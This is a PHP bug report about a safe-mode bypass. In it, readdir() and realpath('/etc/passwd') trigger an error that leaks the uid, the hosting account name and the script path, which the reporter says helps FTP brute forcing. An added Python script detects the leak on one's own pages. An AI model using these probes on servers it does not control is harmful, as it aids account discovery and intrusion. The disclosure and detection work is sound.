From:             cmos_clr at hotmail dot com
Operating system: linux
PHP version:      5.2CVS-2008-12-11 (snap)
PHP Bug Type:     Directory function related
Bug description:  function in safe mode bypass

Description:
------------
Found by : CmOs_CLR & hard_hakerz
MAILS    : [EMAIL PROTECTED] & [EMAIL PROTECTED]
SITE     : wwW.SEC4EVER.coM

----------- ABOUT Software: ----------------
VERSION : PHP 5.2.6
Vendor  : http://www.php.net
--------------------------------------------

Responsible Functions : readdir() , realpath()

WHERE IS THE PROBLEM ?

IN SERVERS WITH SAFE MODE ON AND * getmyuid() * DISABLED WE CAN BYPASS THIS.

FIRST THIS ERROR WILL RESULT : getmyuid() has been disabled for security reasons.

FOR readdir() :

    <?php
    if ($handle = opendir('.')) {
        while (false !== ($file = readdir($handle))) {
            if ($file != "." && $file != "..") {
                echo "$file\n";
            }
        }
        closedir($handle);
    }
    ?>

for realpath() :

    <?php
    echo realpath('/etc/passwd');
    ?>

THE RESULT IS :

The script whose *uid is 100* is not allowed to access /etc/passwd owned by uid 0 in /home/*user*/domains/site.com/public_html/function.php on line xx

NOTE : a lot of other functions can result in this error "getmyuid() bypass". An attacker can take a lot of information from this error, like: is the safe mode activated from http.conf or php.ini? Who is the user of a site? = user of ftp; this can simplify ftp brute forcing to only the case of the pass because the user is known ......etc. This error is a getmyuid() bypass in a disabled function.

thanks+good luck

-- 
Edit bug report at http://bugs.php.net/?id=46831&edit=1
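
Added example, not part of the original report or of PHP itself: a Python check that scans response bodies from your own site for the safe-mode warning quoted above and lists what each one discloses (uids, target path, script path, hosting account name). The URLs, account name and paths in SAMPLE_PAGES are constructed, and the regex assumes the message shape shown in the report.

```python
import re

TAG_RE = re.compile(r"<[^>]+>")
# Message shape taken from the report; the " in <file> on line <n>" tail is optional.
LEAK_RE = re.compile(
    r"The script whose uid is (?P<script_uid>\d+) is not allowed to access "
    r"(?P<target>\S+) owned by uid (?P<owner_uid>\d+)"
    r"(?: in (?P<script_path>\S+) on line (?P<line>\d+))?"
)
HOME_RE = re.compile(r"^/home/([^/]+)/")


def find_leaks(body):
    """Return what each safe-mode warning in a response body discloses."""
    text = TAG_RE.sub("", body)  # html_errors wraps the path and line in <b> tags
    leaks = []
    for m in LEAK_RE.finditer(text):
        leak = m.groupdict()
        home = HOME_RE.match(leak["script_path"] or "")
        # A /home/<name>/ prefix gives away the hosting account name.
        leak["account"] = home.group(1) if home else None
        leaks.append(leak)
    return leaks


def audit(pages):
    """Map URL -> leaks for every page whose body contains the warning."""
    report = {}
    for url, body in pages.items():
        hits = find_leaks(body)
        if hits:
            report[url] = hits
    return report


# Constructed sample responses (hypothetical URLs, account name and paths).
SAMPLE_PAGES = {
    "https://site.example/function.php": (
        "<br />\n<b>Warning</b>:  realpath() [function.realpath]: SAFE MODE "
        "Restriction in effect.  The script whose uid is 100 is not allowed to "
        "access /etc/passwd owned by uid 0 in "
        "<b>/home/alice/domains/site.example/public_html/function.php</b> "
        "on line <b>3</b><br />"
    ),
    "https://site.example/index.php": "<html><body>Welcome</body></html>",
}

if __name__ == "__main__":
    for url, hits in audit(SAMPLE_PAGES).items():
        for hit in hits:
            print(url, hit)
```

Pages it flags are candidates for turning display_errors off, so the warning goes to the error log instead of the client.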